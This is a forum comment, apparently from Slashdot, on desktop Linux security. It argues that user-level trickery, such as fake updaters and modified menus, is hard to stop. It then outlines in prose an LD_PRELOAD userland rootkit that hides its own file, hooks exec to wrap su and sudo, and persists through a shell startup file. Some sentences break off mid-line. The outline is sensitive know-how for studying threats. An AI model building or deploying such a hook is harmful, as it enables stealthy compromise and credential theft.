Comment Re:Malware and Worms in GNU/Linux and *BSD (Score 1) 600
Looks scary, right? Wrong. Because the solution is as simple as changing the default policy. Make it so that the default behavior is to notify only. On every system update the user should be told: "Go start the updater via the system menu. By the way, if you EVER see an "updater" you didn't start yourself, you are being pwned." Make sure that the system menu is strictly read-only, and even the dimmest user will be safe.
This will make it more difficult to trick the user, but not impossible. As long as the system menu is running with the user's privileges, it can be modified to launch a different program. And even if you find a way to prevent the user from messing with it - e.g., run it as a different user - the user won't be able to make any legitimate changes, either.
It's even easier for command-line tools: add a line to
Finally, here's a way to create an almost undetectable malware. Add the line "LD_PRELOAD=~/.malware.so" to
- Removes the LD_PRELOAD variable from the environment, so it's undetectable.
- Modifies "exec..." functions so they add LD_PRELOAD back (and also replace "su", "sudo", etc. with a different program).
- Modifies "open" and "read" functions so the line in
- Modifies "opendir" and "readdir" to make ~/.malware.so invisible to the user.
- etc.
(This would work for any application - not just command-line ones.)